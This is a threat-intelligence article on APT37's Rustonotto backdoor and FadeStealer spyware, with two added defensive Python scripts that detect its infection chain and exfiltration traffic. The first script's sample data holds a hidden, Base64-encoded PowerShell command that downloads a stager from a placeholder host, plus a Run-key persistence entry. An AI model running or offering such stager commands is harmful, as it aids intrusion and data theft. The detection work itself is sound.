The North Korean state-sponsored cyber espionage group APT37 (also tracked as ScarCruft, Ruby Sleet, and Velvet Chollima) has recently expanded its arsenal with sophisticated malware developed in Rust and Python. The shift signals the group’s continued investment in its technical capabilities and evasion techniques.
Background on APT37
Active since 2012, APT37 primarily targets individuals and organizations in South Korea, focusing on those connected to the North Korean regime or involved in human rights activism. The group’s operations have historically included exploiting vulnerabilities in widely used software and employing social engineering tactics to achieve its objectives.
Introduction of Rustonotto Backdoor
In its latest campaign, APT37 introduced a Rust-based backdoor named Rustonotto. The choice of Rust, a language known for its performance and safety guarantees, points to a strategic shift toward more robust, cross-platform malware. Rustonotto functions as a lightweight command executor: it receives Base64-encoded Windows commands and returns the execution results to the attackers’ command-and-control (C2) infrastructure.
Enhanced Python-Based Injection Techniques
Alongside Rustonotto, APT37 has refined its Python-based injection methods to deploy its surveillance tool, FadeStealer. This approach relies on techniques such as Process Doppelgänging and the use of Transactional NTFS (TxF) for stealthy code injection, demonstrating the group’s advanced evasion capabilities.
Attack Methodology
The attack chain typically commences with spear-phishing emails containing malicious Windows shortcut (.lnk) files or Compiled HTML Help (CHM) files. Upon execution, these files initiate a multi-stage infection process:
1. Initial Compromise: The malicious .lnk or CHM files execute embedded PowerShell scripts, establishing persistence mechanisms within the system registry.
2. Deployment of Rustonotto: The PowerShell scripts download and execute the Rustonotto backdoor, enabling the attackers to issue commands and control the compromised system remotely.
3. Advanced Payload Delivery: The attackers utilize Microsoft Cabinet (.cab) files to deliver additional payloads, including the Python-based injection scripts and the encrypted FadeStealer malware.
4. Execution of FadeStealer: The Python injection script decrypts and injects FadeStealer into legitimate Windows processes using Process Doppelgänging, allowing the malware to operate stealthily.
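The four stages above leave distinct host-side traces: a CHM viewer (hh.exe) spawning PowerShell, an encoded PowerShell command that fetches a stager, a Run-key value written by PowerShell, and expand.exe unpacking a .cab. The following triage script is an added example and not code from the article or from any vendor; it walks a constructed stream of Sysmon-style events (EventID 1 process creation, EventID 13 registry value set) and maps each hit back to a stage of the chain. All paths, SIDs, the `c2.invalid` URL and the `updater.exe` name are placeholders, and the rule names (`chm_spawned_powershell` and so on) are this example's own.

```python
import base64
import re

# Constructed Sysmon-style events (not real telemetry); every host, path and
# URL below is a placeholder (".invalid" is a reserved TLD).
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGE_URL = "http://c2.invalid/stage.cab"
STAGER_SCRIPT = f"Invoke-WebRequest {STAGE_URL} -OutFile $env:TEMP\\stage.cab"
# PowerShell's -EncodedCommand expects Base64 of the UTF-16LE script text.
ENCODED = base64.b64encode(STAGER_SCRIPT.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    # 0: the CHM viewer opened from Explorer
    {"EventID": 1, "Image": r"C:\Windows\hh.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Users\victim\Downloads\report.chm'},
    # 1: hh.exe spawning hidden, encoded PowerShell (initial compromise)
    {"EventID": 1, "Image": PS_EXE, "ParentImage": r"C:\Windows\hh.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    # 2: Sysmon EventID 13 (registry value set) under a Run key, written by PowerShell
    {"EventID": 13, "Image": PS_EXE,
     "TargetObject": r"HKU\S-1-5-21-111\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\victim\AppData\Roaming\updater.exe"},
    # 3: expand.exe unpacking a downloaded .cab on behalf of PowerShell
    {"EventID": 1, "Image": r"C:\Windows\System32\expand.exe", "ParentImage": PS_EXE,
     "CommandLine": r"expand.exe C:\Users\victim\AppData\Local\Temp\stage.cab -F:* C:\Users\victim\AppData\Roaming"},
    # 4: benign control event that must not fire
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
]

# Which rule evidences which stage of the chain described in the article.
STAGE_OF_RULE = {
    "chm_spawned_powershell": "initial_compromise",
    "encoded_powershell_download": "stager_download",
    "powershell_run_key_persistence": "registry_persistence",
    "cab_expansion_from_script_host": "cab_payload_delivery",
}
DOWNLOAD_MARKERS = re.compile(r"invoke-webrequest|downloadfile|downloadstring|\.cab\b", re.IGNORECASE)
ENC_ARG = re.compile(r"-(?:enc|encodedcommand|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -enc/-EncodedCommand argument, or None."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events):
    """Match each event against the delivery-chain behaviours; return a list of findings."""
    findings = []
    for idx, ev in enumerate(events):
        image = ev.get("Image", "").lower()
        parent = ev.get("ParentImage", "").lower()
        cmd = ev.get("CommandLine", "")
        if ev.get("EventID") == 1 and image.endswith("\\powershell.exe"):
            if parent.endswith("\\hh.exe"):
                findings.append({"event": idx, "rule": "chm_spawned_powershell"})
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                rule = "encoded_powershell_download" if DOWNLOAD_MARKERS.search(decoded) else "encoded_powershell"
                findings.append({"event": idx, "rule": rule, "decoded": decoded})
        # "\currentversion\run" also covers RunOnce.
        elif ev.get("EventID") == 13 and image.endswith("\\powershell.exe") \
                and "\\currentversion\\run" in ev.get("TargetObject", "").lower():
            findings.append({"event": idx, "rule": "powershell_run_key_persistence",
                             "value": ev.get("Details")})
        elif ev.get("EventID") == 1 and image.endswith("\\expand.exe") and ".cab" in cmd.lower():
            rule = "cab_expansion_from_script_host" if parent.endswith("\\powershell.exe") else "cab_expansion"
            findings.append({"event": idx, "rule": rule})
    return findings


def stages_observed(findings):
    """Collapse findings into the set of chain stages seen on the host."""
    return {STAGE_OF_RULE[f["rule"]] for f in findings if f["rule"] in STAGE_OF_RULE}


if __name__ == "__main__":
    hits = triage(SAMPLE_EVENTS)
    for h in hits:
        print(h)
    print("stages:", sorted(stages_observed(hits)))
```

Seeing all four stages on one host within a short window is far stronger evidence than any single rule; decoding the `-enc` argument also gives an analyst the stager's download target without having to run it.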
Capabilities of FadeStealer
Once deployed, FadeStealer functions as a comprehensive surveillance tool with the following capabilities:
– Keylogging: Records all keystrokes in real time, capturing sensitive information such as passwords and confidential communications.
– Screenshot Capture: Takes screenshots every 30 seconds, providing visual insights into the victim’s activities.
– Audio Recording: Records 5-minute audio sessions, potentially capturing private conversations.
– USB Device Monitoring: Monitors connected USB devices hourly, enabling the exfiltration of data from removable storage.
The collected data is compressed into timestamped archives protected by a hardcoded password and exfiltrated to the attackers’ servers through HTTP POST requests.
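Scheduled collection followed by HTTP POST upload produces a traffic shape that proxy or egress logs can expose even when the archive contents are password-protected: a client repeatedly POSTing large bodies to one external host at a steady cadence while receiving almost nothing back. The detector below is an added example, not code from the article, and it runs over a constructed proxy log in a simple space-separated format of this example's own devising. The article does not state FadeStealer's upload interval, so the 5-minute cadence to `upload.invalid` is an assumption; the logic keys on regularity and upload volume, not on that particular interval.

```python
import statistics
from collections import defaultdict

# Constructed proxy log (not real traffic).
# Fields: epoch_seconds client method host path bytes_sent bytes_received
# The 5-minute POST cadence to upload.invalid is an assumption for illustration.
SAMPLE_LOG = """\
1700000000 10.0.0.5 GET intranet.example.local /index.html 412 20480
1700000010 10.0.0.5 POST upload.invalid /api/v1/data 1843200 210
1700000120 10.0.0.5 POST mail.example.local /send 5120 800
1700000200 10.0.0.7 POST cdn.example.local /telemetry 1024 300
1700000310 10.0.0.5 POST upload.invalid /api/v1/data 1921024 210
1700000615 10.0.0.5 POST upload.invalid /api/v1/data 1876992 210
1700000900 10.0.0.5 POST mail.example.local /send 7340 800
1700000905 10.0.0.5 POST upload.invalid /api/v1/data 1802240 210
1700001200 10.0.0.5 POST upload.invalid /api/v1/data 1950720 210
1700003400 10.0.0.5 POST mail.example.local /send 4096 800
"""


def parse_log(text):
    """Parse the constructed space-separated proxy format into dicts."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, host, path, sent, recv = line.split()
        records.append({"ts": int(ts), "client": client, "method": method, "host": host,
                        "path": path, "sent": int(sent), "recv": int(recv)})
    return records


def find_exfil_candidates(records, min_posts=3, max_cv=0.2, min_bytes=5_000_000, min_ratio=10.0):
    """Flag (client, host) pairs whose POSTs are regularly spaced, upload-heavy and large in total.

    Regularity is the coefficient of variation (CV) of the gaps between successive
    POSTs: a scheduled uploader has a CV near zero, while human-driven traffic such
    as web mail does not. Thresholds are tunable starting points, not fixed truths.
    """
    groups = defaultdict(list)
    for r in records:
        if r["method"] == "POST":
            groups[(r["client"], r["host"])].append(r)
    findings = []
    for (client, host), posts in groups.items():
        if len(posts) < min_posts:
            continue
        posts.sort(key=lambda r: r["ts"])
        gaps = [b["ts"] - a["ts"] for a, b in zip(posts, posts[1:])]
        mean_gap = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean_gap if mean_gap > 0 else float("inf")
        sent = sum(r["sent"] for r in posts)
        recv = sum(r["recv"] for r in posts)
        ratio = sent / recv if recv else float("inf")
        if cv <= max_cv and sent >= min_bytes and ratio >= min_ratio:
            findings.append({"client": client, "host": host, "posts": len(posts),
                             "mean_gap_s": mean_gap, "interval_cv": round(cv, 3),
                             "bytes_sent": sent, "upload_ratio": round(ratio, 1)})
    return findings


if __name__ == "__main__":
    for hit in find_exfil_candidates(parse_log(SAMPLE_LOG)):
        print(hit)
```

In the sample, the web-mail POSTs from the same client are irregular and small, so only the steady uploader is flagged; on real egress data the same three features (cadence, total upload, upload-to-download ratio) are what separate scheduled exfiltration from ordinary browsing.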
Implications and Recommendations
APT37’s adoption of Rust and Python for malware development reflects a significant advancement in their technical sophistication. The use of modern programming languages and advanced injection techniques enhances the malware’s stealth and effectiveness, posing increased challenges for detection and mitigation.
To defend against such threats, organizations should implement the following measures:
– User Education: Conduct regular training sessions to raise awareness about spear-phishing tactics and the risks associated with opening unsolicited attachments.
– Email Filtering: Deploy advanced email filtering solutions to detect and block malicious attachments and links.
– Endpoint Detection and Response (EDR): Utilize EDR solutions capable of identifying and responding to suspicious activities, including unusual process injections and fileless malware techniques.
– Regular Software Updates: Ensure that all software, especially operating systems and commonly used applications, is updated promptly to patch known vulnerabilities.
– Network Monitoring: Implement robust network monitoring to detect anomalous data exfiltration patterns and unauthorized communications with external servers.
By adopting a multi-layered security approach and staying informed about evolving threat landscapes, organizations can enhance their resilience against sophisticated adversaries like APT37.